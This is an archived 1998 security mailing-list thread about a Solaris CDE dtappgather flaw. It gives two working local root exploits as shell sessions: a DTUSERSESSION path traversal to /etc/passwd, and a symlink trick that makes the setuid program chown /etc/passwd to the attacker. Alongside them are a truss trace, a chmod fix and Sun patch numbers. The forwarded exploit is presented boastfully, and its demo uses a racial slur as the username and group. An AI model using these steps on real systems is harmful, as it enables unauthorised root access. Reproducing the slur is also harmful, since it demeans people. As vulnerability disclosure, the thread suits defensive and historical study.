[ http://www.rootshell.com/ ] From costan@amb1.amb.polimi.it Mon Nov 2 08:12:39 1998 Date: Mon, 2 Nov 1998 18:05:59 +0100 (MET) From: Andrea Costantino To: BUGTRAQ@netspace.org, news@rootshell.com Subject: another /usr/dt/bin/dtappgather feature! There's attached the message related to this new feature.. the /usr/dt/bin/dtappgather program tries to read the enviroment variable $DTUSERSESSION to get the name of the file to seek for. The file is searched in /var/dt/appconfig/appmanager. Under SunOS 5.5,5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or 01777 so you're able to make a simbolic link to the file you wish, but on SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this. Unfortunately the dtappgather never check the $DTUSERSESSION variable, so you can use the syntax ../../.. etc... to grab the file you wish, even if you can't write the /var/dt/appconfig/appmanager directory.... For example costan@penelope$ ls -ald /var/dt/appconfig/appmanager drwxr-xr-x 9 bin bin 512 Oct 30 11:27 /var/dt/appconfig/appmanager costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd costan@penelope$ /usr/dt/bin/dtappgather [.... stuff ....] costan@penelope$ ls -al /etc/passwd -r-xr-xr-x 1 costan users 531 Oct 9 14:08 /etc/passwd This way you're satisfied even without making strange link on strange path (the name in CDE are very difficult to remember ;-) ) Best Wishes, admins... Andrea Costantino (aka k0stan) Network Manager at DIIAR Politecnico di Milano Attached message: [ http://www.rootshell.com/ ] Date: Mon, 23 Feb 1998 15:31:16 +0200 From: Mastoras Subject: /usr/dt/bin/dtappgather exploit Buggy program: /usr/dt/bin/dtappgather Description of the problem: Local users can change the ownership of any file, thus gaining root priviledges. This happens because "dtappgather" does not check if the file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and happily chown()s it to the user. When CERT released advisory CA-98.02 about /usr/dt/bin/dtappgather, I played a little with dtappgather and discovered the problem above, but I thought that patch 104498-02 corrects it, as described in SUN's section of 98.02. When I applied the patch, I realised that it was still possible to gain root privs. Systems Affected: *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to make the necessary link. On the other hand, in SunOS 5.5* this dir has mode 777, so you can easily make the link or even unlink/rename the file "generic-display-0" if exists owned by another user. Quick Fix: chmod -s /usr/dt/bin/dtappgather The Exploit: The forwarded exploit was initially posted to hack.gr's security mailing list: "haxor". Hack wisely, Mastoras /* * Computer Engineering & Informatics Department, Patras, Greece * Mastor Wins, Fatality! http://www.hack.gr/users/mastoras */ ---------- Forwarded message ---------- Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET) From: Mastoras Reply-To: haxor@hack.gr To: haxor@papari.hack.gr, Undisclosed recipients: ; Subject: [HAXOR:11] dtappgather exploit Hello, I suppose you have learnt about CERT's advisory on dtappgather program. Well, here's the exploit: nigg0r@host% ls -l /etc/passwd -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0 nigg0r@host% dtappgather MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists nigg0r@host% ls -l /etc/passwd -r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd nigg0r@host% echo "nigg0r wins! Fatality!" | mail root it would be easy to find the exploit if you had read CERT's advisory. the following steps were enough.. % cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies] % truss -o koko ./dtappgather % more koko [ shity ld things ] chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0 chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0 [ shitty things ] I hope this was not too lame or well-known :-) Seeya, mastoras -------------------------------------------------------------------------- Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM) Hi, Sun has published the following patches to address this vulnerability: patches 104497 CDE 1.0.1: dtappgather patch patches 104498 CDE 1.0.2: dtappgather patch patches 104499 CDE 1.0.1_x86: dtappgather patch patches 104500 CDE 1.0.2_x86: dtappgather patch patches 105837 CDE 1.2: dtappgather Patch patches 105838 CDE 1.2_x86: dtappgather Patch thanks, Steve